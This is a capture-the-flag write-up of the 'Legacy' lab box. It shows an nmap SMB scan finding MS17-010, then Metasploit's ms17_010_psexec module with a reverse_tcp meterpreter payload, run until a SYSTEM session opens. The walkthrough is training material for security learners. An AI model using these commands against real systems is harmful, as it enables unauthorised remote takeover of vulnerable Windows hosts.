Legacy is another beginner friendly box that tasks the user with enumerating with NMAP and exploiting the target with metasploit.
Step 1: Enumerate with NMAP
We start our investigation by enumerating the target with NMAP.
➜ legacy nmap -A -v 10.129.227.181 --script smb\* -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-22 17:21 EST
NSE: Loaded 81 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:21
Completed NSE at 17:21, 0.00s elapsed
Initiating NSE at 17:21
Completed NSE at 17:21, 0.00s elapsed
Initiating NSE at 17:21
Completed NSE at 17:21, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:21
Completed Parallel DNS resolution of 1 host. at 17:21, 0.00s elapsed
Initiating Connect Scan at 17:21
Scanning 10.129.227.181 [1000 ports]
Discovered open port 139/tcp on 10.129.227.181
Discovered open port 135/tcp on 10.129.227.181
Discovered open port 445/tcp on 10.129.227.181
Completed Connect Scan at 17:21, 0.46s elapsed (1000 total ports)
Initiating Service scan at 17:21
Scanning 3 services on 10.129.227.181
Completed Service scan at 17:21, 6.12s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.227.181.
Initiating NSE at 17:21
Completed NSE at 17:26, 298.15s elapsed
Initiating NSE at 17:26
Stats: 0:05:05 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 10 (10 waiting)
NSE Timing: About 44.44% done; ETC: 17:26 (0:00:01 remaining)
Completed NSE at 17:28, 90.01s elapsed
Initiating NSE at 17:28
NSE Timing: About 12.50% done; ETC: 17:32 (0:03:37 remaining)
Completed NSE at 17:29, 36.47s elapsed
Nmap scan report for 10.129.227.181
Host is up (0.025s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_smb-flood: ERROR: Script execution failed (use -d to debug)
| smb-psexec: Can't find the service file: nmap_service.exe (or nmap_service).
| Due to false positives in antivirus software, this module is no
| longer included by default. Please download it from
| https://nmap.org/psexec/nmap_service.exe
|_and place it in nselib/data/psexec/ under the Nmap DATADIR.
| smb-brute:
|_ No accounts found
|_smb-print-text: false
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-mbenum:
| Master Browser
| LEGACY 5.1
| Potential Browser
| LEGACY 5.1
| Server service
| LEGACY 5.1
| Windows NT/2000/XP/2003 server
| LEGACY 5.1
| Workstation
|_ LEGACY 5.1
|_smb2-capabilities: SMB 2+ not supported
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-protocols:
| dialects:
|_ NT LM 0.12 (SMBv1) [dangerous, but default]
NSE: Script Post-scanning.
Initiating NSE at 17:29
Completed NSE at 17:29, 0.00s elapsed
Initiating NSE at 17:29
Completed NSE at 17:29, 0.00s elapsed
Initiating NSE at 17:29
Completed NSE at 17:29, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 431.52 seconds
The scan results indicate that the target may be vulnerable to the MS17-010 exploit. Let’s load up metasploit and see if we can find a port of this exploit.
Step 2: Exploiting the Target with Metasploit
➜ legacy msfconsole
. .
.
dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB
dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP
.
.
o To boldly go where no
shell has gone before
=[ metasploit v6.2.37-dev- ]
+ -- --=[ 2277 exploits - 1194 auxiliary - 408 post ]
+ -- --=[ 948 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with
advanced
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
We search for ms17-010 exploits, and we a presented with several options. After trying each, we finally make some progess with exploit 1.
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.173 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 10.129.227.181
rhosts => 10.129.227.181
msf6 exploit(windows/smb/ms17_010_psexec) > set lhost 10.10.14.86
lhost => 10.10.14.86
msf6 exploit(windows/smb/ms17_010_psexec) > run
We then supply the requested info and run the exploit, but we soon run into more issues. The exploit is known to be very finnicky, and takes several attempts to establish a connection to the victim server.
[*] Started reverse TCP handler on 10.10.14.86:4444
[-] 10.129.227.181:445 - Rex::ConnectionTimeout: The connection with (10.129.227.181:445) timed out.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.14.86:4444
[-] 10.129.227.181:445 - Rex::ConnectionTimeout: The connection with (10.129.227.181:445) timed out.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.14.86:4444
[-] 10.129.227.181:445 - Rex::ConnectionTimeout: The connection with (10.129.227.181:445) timed out.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.86:4444
[-] 10.129.227.181:445 - Rex::ConnectionTimeout: The connection with (10.129.227.181:445) timed out.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.86:4444
[-] 10.129.227.181:445 - Rex::ConnectionTimeout: The connection with (10.129.227.181:445) timed out.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.86:4444
[*] 10.129.227.181:445 - Target OS: Windows 5.1
[*] 10.129.227.181:445 - Filling barrel with fish... done
[*] 10.129.227.181:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.129.227.181:445 - [*] Preparing dynamite...
[*] 10.129.227.181:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.129.227.181:445 - [+] Successfully Leaked Transaction!
[*] 10.129.227.181:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.129.227.181:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.129.227.181:445 - Reading from CONNECTION struct at: 0x86470010
[*] 10.129.227.181:445 - Built a write-what-where primitive...
[+] 10.129.227.181:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.129.227.181:445 - Selecting native target
[*] 10.129.227.181:445 - Uploading payload... gaMcqsAw.exe
[*] 10.129.227.181:445 - Created \gaMcqsAw.exe...
[+] 10.129.227.181:445 - Service started successfully...
[*] Sending stage (175686 bytes) to 10.129.227.181
[*] 10.129.227.181:445 - Deleting \gaMcqsAw.exe...
[*] Meterpreter session 1 opened (10.10.14.86:4444 -> 10.129.227.181:1032) at 2023-01-22 17:33:01 -0500
After several tries we are finally able to connect to the target server. We can now check to see what user we are running as to see what level of privlege we have attained.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We have administrator privileges! The only step that remains is to navigate to each user’s desktop to find and submit the flags.